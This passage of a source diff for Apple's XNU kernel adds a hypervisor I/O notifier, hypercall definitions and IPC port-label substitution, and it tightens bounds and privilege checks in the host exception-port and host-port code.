+SCALABLE_COUNTER_DECLARE(vm_statistics_hits); /* object cache hits */ +SCALABLE_COUNTER_DECLARE(vm_statistics_purges); /* # of pages purged */ +SCALABLE_COUNTER_DECLARE(vm_statistics_decompressions); /* # of pages decompressed */ +SCALABLE_COUNTER_DECLARE(vm_statistics_compressions); /* # of pages compressed */ +SCALABLE_COUNTER_DECLARE(vm_statistics_swapins); /* # of pages swapped in (via compression segments) */ +SCALABLE_COUNTER_DECLARE(vm_statistics_swapouts); /* # of pages swapped out (via compression segments) */ +SCALABLE_COUNTER_DECLARE(vm_statistics_total_uncompressed_pages_in_compressor); /* # of pages (uncompressed) held within the compressor. */ -PERCPU_DECL(vm_statistics64_data_t, vm_stat); -PERCPU_DECL(uint64_t, vm_page_grab_count); - -#define VM_STAT_INCR(event) \ -MACRO_BEGIN \ - os_atomic_inc(&PERCPU_GET(vm_stat)->event, relaxed); \ -MACRO_END - -#define VM_STAT_INCR_BY(event, amount) \ -MACRO_BEGIN \ - os_atomic_add(&PERCPU_GET(vm_stat)->event, amount, relaxed); \ -MACRO_END +SCALABLE_COUNTER_DECLARE(vm_page_grab_count); #endif /* _KERN_HOST_STATISTICS_H_ */ diff --git a/osfmk/kern/hv_io_notifier.c b/osfmk/kern/hv_io_notifier.c new file mode 100644 index 000000000..7f0938fa4 --- /dev/null +++ b/osfmk/kern/hv_io_notifier.c @@ -0,0 +1,274 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#include +#include +#include +#include +#include +#include +#include + +#include + +#include "hv_io_notifier.h" + +static LCK_GRP_DECLARE(ion_lock_grp, "io notifier"); + +typedef struct hv_ion_entry { + LIST_ENTRY(hv_ion_entry) list; + + uint64_t addr; + size_t size; + uint64_t value; + uint32_t flags; + + mach_port_t port; + mach_port_name_t port_name; +} hv_ion_entry_t; + +LIST_HEAD(io_notifier_list, hv_ion_entry); + +struct hv_ion_grp { + struct io_notifier_list list; + lck_rw_t lock; +}; + +/* + * Lookup a matching notifier and return it. + */ +static hv_ion_entry_t * +hv_io_notifier_grp_lookup(const hv_ion_grp_t *grp, const hv_ion_entry_t *key) +{ + hv_ion_entry_t *ion = NULL; + + LIST_FOREACH(ion, &grp->list, list) { + if (ion->addr != key->addr) { + continue; + } + + if (!(ion->flags & kHV_ION_ANY_SIZE) && ion->size != key->size) { + continue; + } + + if (!(ion->flags & kHV_ION_ANY_VALUE) && ion->value != key->value) { + continue; + } + + if (ion->port_name != key->port_name) { + continue; + } + + if (ion->flags != key->flags) { + continue; + } + + return ion; + } + + return NULL; +} + +/* + * Add a new notifier. + * Return KERN_SUCCESS if the notifier was added, an error otherwise. + */ +kern_return_t +hv_io_notifier_grp_add(hv_ion_grp_t *grp, const hv_ion_t *notifier) +{ + hv_ion_entry_t *ion = NULL; + + ion = kalloc(sizeof(*ion)); + if (ion == NULL) { + return KERN_RESOURCE_SHORTAGE; + } + + ion->addr = notifier->addr; + ion->size = notifier->size; + ion->value = notifier->value; + ion->flags = notifier->flags; + ion->port_name = notifier->port_name; + + kern_return_t ret = ipc_object_copyin(current_task()->itk_space, + ion->port_name, MACH_MSG_TYPE_COPY_SEND, (ipc_object_t *)&ion->port, 0, + NULL, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND); + if (ret != KERN_SUCCESS) { + kfree(ion, sizeof(*ion)); + return ret; + } + + lck_rw_lock_exclusive(&grp->lock); + + if (hv_io_notifier_grp_lookup(grp, ion) != NULL) { + lck_rw_done(&grp->lock); + ipc_port_release_send(ion->port); + kfree(ion, sizeof(*ion)); + return KERN_FAILURE; + } + + LIST_INSERT_HEAD(&grp->list, ion, list); + + lck_rw_done(&grp->lock); + + return KERN_SUCCESS; +} + +/* + * Remove and free a notifier. + * Return KERN_SUCCESS if the notifier was removed, an error otherwise. + */ +kern_return_t +hv_io_notifier_grp_remove(hv_ion_grp_t *grp, const hv_ion_t *notifier) +{ + hv_ion_entry_t ion = {}; + hv_ion_entry_t *entry = NULL; + + ion.addr = notifier->addr; + ion.size = notifier->size; + ion.value = notifier->value; + ion.flags = notifier->flags; + ion.port_name = notifier->port_name; + + lck_rw_lock_exclusive(&grp->lock); + + entry = hv_io_notifier_grp_lookup(grp, &ion); + if (entry == NULL) { + lck_rw_done(&grp->lock); + return KERN_FAILURE; + } + + LIST_REMOVE(entry, list); + + lck_rw_done(&grp->lock); + + ipc_port_release_send(entry->port); + kfree(entry, sizeof(*entry)); + + return KERN_SUCCESS; +} + +/* + * Find matching notifiers and notify the port. + * Returns KERN_SUCCESS if no errors occurred when sending notifications and at + * least one notification was sent. + */ +kern_return_t +hv_io_notifier_grp_fire(hv_ion_grp_t *grp, uint64_t addr, size_t size, + uint64_t value) +{ + kern_return_t kr = KERN_FAILURE; + hv_ion_entry_t *ion = NULL; + bool fired = false; + + lck_rw_lock_shared(&grp->lock); + + LIST_FOREACH(ion, &grp->list, list) { + if (ion->addr != addr) { + continue; + } + + if (!(ion->flags & kHV_ION_ANY_SIZE) && ion->size != size) { + continue; + } + + if (!(ion->flags & kHV_ION_ANY_VALUE) && ion->value != value) { + continue; + } + + hv_ion_message_t msg = { + .header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0), + .header.msgh_size = sizeof(msg), + .header.msgh_remote_port = ion->port, + .header.msgh_local_port = MACH_PORT_NULL, + .header.msgh_voucher_port = MACH_PORT_NULL, + .header.msgh_id = 0, + + .addr = addr, + .size = size, + .value = value, + }; + + kr = mach_msg_send_from_kernel_with_options(&msg.header, sizeof(msg), + MACH_SEND_TIMEOUT, MACH_MSG_TIMEOUT_NONE); + + /* + * A timeout will occur when the queue is full. Ignore it if so + * configured. + */ + if (kr == MACH_SEND_TIMED_OUT && !(ion->flags & kHV_ION_EXIT_FULL)) { + kr = MACH_MSG_SUCCESS; + } + + if (kr != MACH_MSG_SUCCESS) { + fired = false; + break; + } + + fired = true; + } + + lck_rw_done(&grp->lock); + return fired ? KERN_SUCCESS : KERN_FAILURE; +} + +kern_return_t +hv_io_notifier_grp_alloc(hv_ion_grp_t **grp_p ) +{ + hv_ion_grp_t *grp = kalloc(sizeof(*grp)); + + if (grp == NULL) { + return KERN_RESOURCE_SHORTAGE; + } + bzero(grp, sizeof(*grp)); + + lck_rw_init(&grp->lock, &ion_lock_grp, LCK_ATTR_NULL); + + *grp_p = grp; + return KERN_SUCCESS; +} + +void +hv_io_notifier_grp_free(hv_ion_grp_t **grp_p) +{ + hv_ion_grp_t *grp = *grp_p; + + while (!LIST_EMPTY(&grp->list)) { + hv_ion_entry_t *ion = LIST_FIRST(&grp->list); + + LIST_REMOVE(ion, list); + + ipc_port_release_send(ion->port); + kfree(ion, sizeof(*ion)); + } + + lck_rw_destroy(&grp->lock, &ion_lock_grp); + + kfree(grp, sizeof(*grp)); + + *grp_p = NULL; +} diff --git a/osfmk/kern/hv_io_notifier.h b/osfmk/kern/hv_io_notifier.h new file mode 100644 index 000000000..cd50a3f04 --- /dev/null +++ b/osfmk/kern/hv_io_notifier.h @@ -0,0 +1,74 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#pragma once + +#include +#include + +#ifdef __cplusplus +extern "C" { +#endif + +enum { + kHV_ION_NONE = (0u << 0), + kHV_ION_ANY_VALUE = (1u << 1), + kHV_ION_ANY_SIZE = (1u << 2), + kHV_ION_EXIT_FULL = (1u << 3), +}; + +#ifdef KERNEL_PRIVATE + +typedef struct { + mach_msg_header_t header; + uint64_t addr; + uint64_t size; + uint64_t value; +} hv_ion_message_t; + +typedef struct { + uint64_t addr; + uint64_t size; + uint64_t value; + uint32_t port_name; + uint32_t flags; +} hv_ion_t; + +typedef struct hv_ion_grp hv_ion_grp_t; + +extern kern_return_t hv_io_notifier_grp_add(hv_ion_grp_t *grp, const hv_ion_t *); +extern kern_return_t hv_io_notifier_grp_remove(hv_ion_grp_t *, const hv_ion_t *); +extern kern_return_t hv_io_notifier_grp_fire(hv_ion_grp_t *, uint64_t, size_t, uint64_t); +extern kern_return_t hv_io_notifier_grp_alloc(hv_ion_grp_t **); +extern void hv_io_notifier_grp_free(hv_ion_grp_t **); + +#endif /* KERNEL_PRIVATE */ + +#ifdef __cplusplus +} +#endif diff --git a/osfmk/kern/hv_support_kext.c b/osfmk/kern/hv_support_kext.c index ca9054202..39ef71694 100644 --- a/osfmk/kern/hv_support_kext.c +++ b/osfmk/kern/hv_support_kext.c @@ -33,6 +33,7 @@ #include #include #include +#include #if defined(__x86_64__) && CONFIG_VMX #include @@ -52,6 +53,8 @@ hv_callbacks_t hv_callbacks = { .thread_destroy = NULL, /* thread is being destroyed */ .task_destroy = NULL, /* task is being destroyed */ .volatile_state = NULL, /* thread state is becoming volatile */ + .resume = NULL, /* system is being resumed */ + .memory_pressure = NULL,/* (unused) */ }; /* trap tables for hv_*_trap syscalls */ @@ -192,7 +195,8 @@ hv_release_callbacks(void) .suspend = NULL, .thread_destroy = NULL, .task_destroy = NULL, - .volatile_state = NULL + .volatile_state = NULL, + .resume = NULL, }; hv_callbacks_enabled = 0; @@ -208,6 +212,15 @@ hv_suspend(void) } } +/* system resume notification */ +void +hv_resume(void) +{ + if (hv_callbacks_enabled && hv_callbacks.resume) { + hv_callbacks.resume(); + } +} + /* dispatch hv_task_trap/hv_thread_trap syscalls to trap handlers, * fail for invalid index or absence of trap handlers, trap handler is * responsible for validating targets */ @@ -244,10 +257,30 @@ void hv_trace_guest_enter(uint32_t vcpu_id, uint64_t *vcpu_regs) { DTRACE_HV2(guest__enter, uint32_t, vcpu_id, uint64_t *, vcpu_regs); + + KDBG(MACHDBG_CODE(DBG_MACH_HV, HV_GUEST_ENTER) | DBG_FUNC_START, vcpu_id); } void -hv_trace_guest_exit(uint32_t vcpu_id, uint64_t *vcpu_regs) +hv_trace_guest_exit(uint32_t vcpu_id, uint64_t *vcpu_regs, uint32_t reason) { + KDBG(MACHDBG_CODE(DBG_MACH_HV, HV_GUEST_ENTER) | DBG_FUNC_END, vcpu_id, + reason); + DTRACE_HV2(guest__exit, uint32_t, vcpu_id, uint64_t *, vcpu_regs); } + +void +hv_trace_guest_error(uint32_t vcpu_id, uint64_t *vcpu_regs, uint32_t failure, + uint32_t error) +{ + /* + * An error indicates that the guest enter failed so there will be no + * guest exit. Close the guest enter interval. + */ + KDBG(MACHDBG_CODE(DBG_MACH_HV, HV_GUEST_ENTER) | DBG_FUNC_END, vcpu_id, + -1, failure, error); + KDBG(MACHDBG_CODE(DBG_MACH_HV, HV_GUEST_ERROR), vcpu_id, failure, error); + + DTRACE_HV3(guest__error, uint32_t, vcpu_id, uint64_t *, vcpu_regs, uint32_t, failure); +} diff --git a/osfmk/kern/hv_support_kext.h b/osfmk/kern/hv_support_kext.h index 0b7fa64d1..a744516a9 100644 --- a/osfmk/kern/hv_support_kext.h +++ b/osfmk/kern/hv_support_kext.h @@ -36,6 +36,7 @@ extern "C" { #include #include #include +#include typedef enum { HV_DEBUG_STATE @@ -60,6 +61,8 @@ typedef struct { void (*thread_destroy)(void *vcpu); void (*task_destroy)(void *vm); void (*volatile_state)(void *vcpu, int state); +#define HV_CALLBACKS_RESUME_DEFINED 1 + void (*resume)(void); void (*memory_pressure)(void); } hv_callbacks_t; @@ -79,13 +82,17 @@ extern void hv_release_traps(hv_trap_type_t trap_type); extern kern_return_t hv_set_callbacks(hv_callbacks_t callbacks); extern void hv_release_callbacks(void); extern void hv_suspend(void); +extern void hv_resume(void); extern kern_return_t hv_task_trap(uint64_t index, uint64_t arg); extern kern_return_t hv_thread_trap(uint64_t index, uint64_t arg); extern boolean_t hv_ast_pending(void); extern void hv_port_notify(mach_msg_header_t *msg); extern void hv_trace_guest_enter(uint32_t vcpu_id, uint64_t *vcpu_regs); -extern void hv_trace_guest_exit(uint32_t vcpu_id, uint64_t *vcpu_regs); +extern void hv_trace_guest_exit(uint32_t vcpu_id, uint64_t *vcpu_regs, + uint32_t reason); +extern void hv_trace_guest_error(uint32_t vcpu_id, uint64_t *vcpu_regs, + uint32_t failure, uint32_t error); #if defined(__cplusplus) } diff --git a/osfmk/kern/hvg_hypercall.h b/osfmk/kern/hvg_hypercall.h new file mode 100644 index 000000000..d559fa340 --- /dev/null +++ b/osfmk/kern/hvg_hypercall.h @@ -0,0 +1,106 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#ifndef _KERN_HVG_HYPERCALL_H_ +#define _KERN_HVG_HYPERCALL_H_ + +#include +#include + +/* Architecture-independent definitions (exported to userland) */ + +/* + * Apple Hypercall arguments + */ +typedef struct hvg_hcall_args { + uint64_t args[6]; +} hvg_hcall_args_t; + + +/* + * Apple Hypercall return output + */ +typedef struct hvg_hcall_output { + uint64_t regs[7]; +} hvg_hcall_output_t; + + +/* + * Apple Hypercall return code + */ + +OS_CLOSED_ENUM(hvg_hcall_return, uint32_t, + HVG_HCALL_SUCCESS = 0x0000, /* The call succeeded */ + HVG_HCALL_ACCESS_DENIED = 0x0001, /* Invalid access right */ + HVG_HCALL_INVALID_CODE = 0x0002, /* Hypercall code not recognized */ + HVG_HCALL_INVALID_PARAMETER = 0x0003, /* Specified register value not valid */ + HVG_HCALL_IO_FAILED = 0x0004, /* Input/output error */ + HVG_HCALL_FEAT_DISABLED = 0x0005, /* Feature not available */ + HVG_HCALL_UNSUPPORTED = 0x0006, /* Hypercall not supported */ + ); + + +/* + * Apple Hypercall call code + */ + +OS_CLOSED_ENUM(hvg_hcall_code, uint32_t, + HVG_HCALL_TRIGGER_DUMP = 0x0001, /* Collect guest dump */ + ); + +/* + * Options for collecting kernel vmcore + */ + +OS_CLOSED_OPTIONS(hvg_hcall_dump_option, uint32_t, + HVG_HCALL_DUMP_OPTION_REGULAR = 0x0001 /* Regular dump-guest-memory */ + ); + +typedef struct hvg_hcall_vmcore_file { + char tag[57]; /* 7 64-bit registers plus 1 byte for '\0' */ +} hvg_hcall_vmcore_file_t; + +extern hvg_hcall_return_t +hvg_hcall_trigger_dump(hvg_hcall_vmcore_file_t *vmcore, + const hvg_hcall_dump_option_t dump_option); + + +#ifdef XNU_KERNEL_PRIVATE + +/* + * For XNU kernel use only (omitted from userland headers) + */ + +#if defined (__x86_64__) +#include +#include +#endif + +#endif /* XNU_KERNEL_PRIVATE */ + +#endif /* _KERN_HV_HYPERCALL_H_ */ diff --git a/osfmk/kern/ipc_host.c b/osfmk/kern/ipc_host.c index 427bcee12..33612c5f9 100644 --- a/osfmk/kern/ipc_host.c +++ b/osfmk/kern/ipc_host.c @@ -302,11 +302,17 @@ convert_port_to_host_priv( { host_t host = HOST_NULL; + /* reject translation if itk_host is not host_priv */ + if (port != current_task()->itk_host) { + return HOST_NULL; + } + if (IP_VALID(port)) { ip_lock(port); if (ip_active(port) && (ip_kotype(port) == IKOT_HOST_PRIV)) { - host = (host_t) ip_get_kobject(port); + assert(ip_get_kobject(port) == &realhost); + host = &realhost; } ip_unlock(port); } @@ -602,8 +608,6 @@ host_set_exception_ports( } #endif - assert(host_priv == &realhost); - host_lock(host_priv); for (i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) { @@ -696,8 +700,6 @@ host_get_exception_ports( return KERN_INVALID_ARGUMENT; } - assert(host_priv == &realhost); - host_lock(host_priv); count = 0; @@ -716,16 +718,13 @@ host_get_exception_ports( break; } }/* for */ - if (j == count) { + if (j == count && count < *CountCnt) { masks[j] = (1 << i); ports[j] = ipc_port_copy_send(host_priv->exc_actions[i].port); behaviors[j] = host_priv->exc_actions[i].behavior; flavors[j] = host_priv->exc_actions[i].flavor; count++; - if (count > *CountCnt) { - break; - } } } }/* for */ diff --git a/osfmk/kern/ipc_kobject.c b/osfmk/kern/ipc_kobject.c index 9a3e468b2..dc196835a 100644 --- a/osfmk/kern/ipc_kobject.c +++ b/osfmk/kern/ipc_kobject.c @@ -110,7 +110,9 @@ #include #include +#if CONFIG_USER_NOTIFICATION #include +#endif #if CONFIG_ARCADE #include @@ -127,6 +129,7 @@ #include #endif /* XK_PROXY */ +#include #include #include #include @@ -143,9 +146,9 @@ #include #include #include -#include #include #include +#include #if HYPERVISOR #include @@ -174,9 +177,6 @@ typedef struct { mig_routine_t routine; int size; int kobjidx; -#if MACH_COUNTERS - mach_counter_t callcount; -#endif } mig_hash_t; #define MAX_MIG_ENTRIES 1031 @@ -213,7 +213,9 @@ static const struct mig_subsystem *mig_e[] = { #ifdef VM32_SUPPORT (const struct mig_subsystem *)&vm32_map_subsystem, #endif +#if CONFIG_USER_NOTIFICATION (const struct mig_subsystem *)&UNDReply_subsystem, +#endif (const struct mig_subsystem *)&mach_voucher_subsystem, (const struct mig_subsystem *)&mach_voucher_attr_control_subsystem, (const struct mig_subsystem *)&memory_entry_subsystem, @@ -301,10 +303,6 @@ find_mig_hash_entry(int msgh_id) if (!ptr->routine || msgh_id != ptr->num) { ptr = (mig_hash_t *)0; - } else { -#if MACH_COUNTERS - ptr->callcount++; -#endif } return ptr; @@ -724,6 +722,9 @@ ipc_kobject_init_port( if (options & IPC_KOBJECT_ALLOC_IMMOVABLE_SEND) { port->ip_immovable_send = 1; } + if (options & IPC_KOBJECT_ALLOC_PINNED) { + port->ip_pinned = 1; + } } /* @@ -791,6 +792,42 @@ ipc_kobject_alloc_labeled_port( return port; } +static void +ipc_kobject_subst_once_notify(mach_msg_header_t *msg) +{ + mach_no_senders_notification_t *notification = (void *)msg; + ipc_port_t port = notification->not_header.msgh_remote_port; + + require_ip_active(port); + assert(IKOT_PORT_SUBST_ONCE == ip_kotype(port)); + + ip_release((ipc_port_t)ip_get_kobject(port)); + ipc_port_dealloc_kernel(port); +} + +/* + * Routine: ipc_kobject_alloc_subst_once + * Purpose: + * Make a port that will be substituted by the kolabel + * rules once, preventing the next substitution (of its target) + * to happen if any. + * + * Returns: + * A port with a send right, that will substitute to its "kobject". + * + * Conditions: + * No locks held (memory is allocated) + * `target` has a refcount that this function consumes + */ +ipc_port_t +ipc_kobject_alloc_subst_once( + ipc_port_t target) +{ + return ipc_kobject_alloc_labeled_port(target, + IKOT_PORT_SUBST_ONCE, IPC_LABEL_SUBST_ONCE, + IPC_KOBJECT_ALLOC_MAKE_SEND | IPC_KOBJECT_ALLOC_NSREQUEST); +} + /* * Routine: ipc_kobject_make_send_lazy_alloc_port * Purpose: @@ -820,6 +857,7 @@ ipc_kobject_make_send_lazy_alloc_port( ipc_port_t *port_store, ipc_kobject_t kobject, ipc_kobject_type_t type, + ipc_kobject_alloc_options_t alloc_opts, boolean_t __ptrauth_only should_ptrauth, uint64_t __ptrauth_only ptrauth_discriminator) { @@ -839,7 +877,7 @@ ipc_kobject_make_send_lazy_alloc_port( if (!IP_VALID(port)) { port = ipc_kobject_alloc_port(kobject, type, - IPC_KOBJECT_ALLOC_MAKE_SEND | IPC_KOBJECT_ALLOC_NSREQUEST); + IPC_KOBJECT_ALLOC_MAKE_SEND | IPC_KOBJECT_ALLOC_NSREQUEST | alloc_opts); #if __has_feature(ptrauth_calls) if (should_ptrauth) { @@ -1009,40 +1047,150 @@ ipc_kobject_destroy( } /* - * Routine: ipc_kobject_label_check + * Routine: ipc_kobject_label_substitute_task + * Purpose: + * Substitute a task control port for its immovable + * equivalent when the receiver is that task. + * Conditions: + * Space is write locked and active. + * Port is locked and active. + * Returns: + * - IP_NULL port if no substitution is to be done + * - a valid port if a substitution needs to happen + */ +static ipc_port_t +ipc_kobject_label_substitute_task( + ipc_space_t space, + ipc_port_t port) +{ + ipc_port_t subst = IP_NULL; + task_t task = ipc_kobject_get(port); + + if (task != TASK_NULL && task == space->is_task) { + if ((subst = port->ip_alt_port)) { + return subst; + } + } + + return IP_NULL; +} + +/* + * Routine: ipc_kobject_label_substitute_thread + * Purpose: + * Substitute a thread control port for its immovable + * equivalent when it belongs to the receiver task. + * Conditions: + * Space is write locked and active. + * Port is locked and active. + * Returns: + * - IP_NULL port if no substitution is to be done + * - a valid port if a substitution needs to happen + */ +static ipc_port_t +ipc_kobject_label_substitute_thread( + ipc_space_t space, + ipc_port_t port) +{ + ipc_port_t subst = IP_NULL; + thread_t thread = ipc_kobject_get(port); + + if (thread != THREAD_NULL && space->is_task == thread->task) { + if ((subst = port->ip_alt_port) != IP_NULL) { + return subst; + } + } + + return IP_NULL; +} + +/* + * Routine: ipc_kobject_label_check * Purpose: - * Check to see if the space is allowed to possess a - * right for the given port. In order to qualify, the - * space label must contain all the privileges listed - * in the port/kobject label. + * Check to see if the space is allowed to possess + * a right for the given port. In order to qualify, + * the space label must contain all the privileges + * listed in the port/kobject label. * * Conditions: * Space is write locked and active. - * Port is locked and active. + * Port is locked and active. + * + * Returns: + * Whether the copyout is authorized. + * + * If a port substitution is requested, the space is unlocked, + * the port is unlocked and its "right" consumed. + * + * As of now, substituted ports only happen for send rights. */ -boolean_t +bool ipc_kobject_label_check( - ipc_space_t space, - ipc_port_t port, - __unused mach_msg_type_name_t msgt_name) + ipc_space_t space, + ipc_port_t port, + mach_msg_type_name_t msgt_name, + ipc_object_copyout_flags_t *flags, + ipc_port_t *subst_portp) { ipc_kobject_label_t labelp; + ipc_label_t label; assert(is_active(space)); assert(ip_active(port)); + *subst_portp = IP_NULL; + /* Unlabled ports/kobjects are always allowed */ if (!ip_is_kolabeled(port)) { - return TRUE; + return true; } /* Never OK to copyout the receive right for a labeled kobject */ if (msgt_name == MACH_MSG_TYPE_PORT_RECEIVE) { - panic("ipc_kobject_label_check: attempted receive right copyout for labeled kobject"); + panic("ipc_kobject_label_check: attempted receive right " + "copyout for labeled kobject"); } labelp = port->ip_kolabel; - return (labelp->ikol_label & space->is_label) == labelp->ikol_label; + label = labelp->ikol_label; + + if ((*flags & IPC_OBJECT_COPYOUT_FLAGS_NO_LABEL_CHECK) == 0 && + (label & IPC_LABEL_SUBST_MASK)) { + ipc_port_t subst = IP_NULL; + + if (msgt_name != MACH_MSG_TYPE_PORT_SEND) { + return false; + } + + switch (label & IPC_LABEL_SUBST_MASK) { + case IPC_LABEL_SUBST_TASK: + subst = ipc_kobject_label_substitute_task(space, port); + break; + case IPC_LABEL_SUBST_THREAD: + subst = ipc_kobject_label_substitute_thread(space, port); + break; + case IPC_LABEL_SUBST_ONCE: + /* the next check will _not_ substitute */ + *flags |= IPC_OBJECT_COPYOUT_FLAGS_NO_LABEL_CHECK; + subst = ip_get_kobject(port); + break; + default: + panic("unexpected label: %llx\n", label); + } + + if (subst != IP_NULL) { + ip_reference(subst); + is_write_unlock(space); + ipc_port_release_send_and_unlock(port); + port = ipc_port_make_send(subst); + ip_release(subst); + *subst_portp = port; + return true; + } + } + + return (label & space->is_label & IPC_LABEL_SPACE_MASK) == + (label & IPC_LABEL_SPACE_MASK); } boolean_t @@ -1083,6 +1231,10 @@ ipc_kobject_notify( ipc_voucher_attr_control_notify(request_header); return TRUE; + case IKOT_PORT_SUBST_ONCE: + ipc_kobject_subst_once_notify(request_header); + return TRUE; + case IKOT_SEMAPHORE: semaphore_notify(request_header); return TRUE; @@ -1139,6 +1291,9 @@ ipc_kobject_notify( case IKOT_SUID_CRED: suid_cred_notify(request_header); return TRUE; + case IKOT_TASK_ID_TOKEN: + task_id_token_notify(request_header); + return TRUE; #if HYPERVISOR case IKOT_HYPERVISOR: hv_port_notify(request_header); diff --git a/osfmk/kern/ipc_kobject.h b/osfmk/kern/ipc_kobject.h index 02614a531..62c55cc9a 100644 --- a/osfmk/kern/ipc_kobject.h +++ b/osfmk/kern/ipc_kobject.h @@ -98,7 +98,7 @@ typedef natural_t ipc_kobject_type_t; #define IKOT_PSET 6 #define IKOT_PSET_NAME 7 #define IKOT_TIMER 8 -#define IKOT_PAGING_REQUEST 9 +#define IKOT_PORT_SUBST_ONCE 9 #define IKOT_MIG 10 #define IKOT_MEMORY_OBJECT 11 #define IKOT_XMM_PAGER 12 @@ -139,12 +139,13 @@ typedef natural_t ipc_kobject_type_t; #define IKOT_THREAD_READ 47 #define IKOT_SUID_CRED 48 #define IKOT_HYPERVISOR 49 +#define IKOT_TASK_ID_TOKEN 50 /* * Add new entries here and adjust IKOT_UNKNOWN. * Please keep ipc/ipc_object.c:ikot_print_array up to date. */ -#define IKOT_UNKNOWN 50 /* magic catchall */ +#define IKOT_UNKNOWN 51 /* magic catchall */ #define IKOT_MAX_TYPE (IKOT_UNKNOWN+1) /* # of IKOT_ types */ /* set the bitstring index for kobject */ @@ -191,6 +192,8 @@ __options_decl(ipc_kobject_alloc_options_t, uint32_t, { IPC_KOBJECT_ALLOC_IMMOVABLE_SEND = 0x00000008, /* Add a label structure to the port */ IPC_KOBJECT_ALLOC_LABEL = 0x00000010, + /* Make all rights pinned (non dealloc-able) in an ipc space*/ + IPC_KOBJECT_ALLOC_PINNED = 0x00000020, }); /* Allocates a kobject port, never fails */ @@ -206,11 +209,15 @@ extern ipc_port_t ipc_kobject_alloc_labeled_port( ipc_label_t label, ipc_kobject_alloc_options_t options); +extern ipc_port_t ipc_kobject_alloc_subst_once( + ipc_port_t target); + /* Makes a send right, lazily allocating a kobject port, arming for no-senders, never fails */ extern boolean_t ipc_kobject_make_send_lazy_alloc_port( ipc_port_t *port_store, ipc_kobject_t kobject, ipc_kobject_type_t type, + ipc_kobject_alloc_options_t alloc_opts, boolean_t should_ptrauth, uint64_t ptrauth_discriminator) __result_use_check; @@ -235,10 +242,28 @@ ipc_kobject_get(ipc_port_t port) } /* Check if a kobject can be copied out to a given space */ -extern boolean_t ipc_kobject_label_check( - ipc_space_t space, - ipc_port_t port, - mach_msg_type_name_t msgt_name); +extern bool ipc_kobject_label_check( + ipc_space_t space, + ipc_port_t port, + mach_msg_type_name_t msgt_name, + ipc_object_copyout_flags_t *flags, + ipc_port_t *subst_portp) __result_use_check; + +__result_use_check +static inline bool +ip_label_check( + ipc_space_t space, + ipc_port_t port, + mach_msg_type_name_t msgt_name, + ipc_object_copyout_flags_t *flags, + ipc_port_t *subst_portp) +{ + if (!ip_is_kolabeled(port)) { + *subst_portp = IP_NULL; + return true; + } + return ipc_kobject_label_check(space, port, msgt_name, flags, subst_portp); +} /* Release any kernel object resources associated with a port */ extern void ipc_kobject_destroy( @@ -249,6 +274,21 @@ extern void ipc_kobject_destroy( extern kern_return_t uext_server(ipc_kmsg_t request, ipc_kmsg_t * reply); +/* These boot-args decide if the pinned and immovable ports can be copied out to IPC space */ +__options_decl(ipc_control_port_options_t, uint32_t, { + IPC_CONTROL_PORT_OPTIONS_NONE = 0x00, + + IPC_CONTROL_PORT_OPTIONS_PINNED_SOFT = 0x01, + IPC_CONTROL_PORT_OPTIONS_PINNED_HARD = 0x02, + + 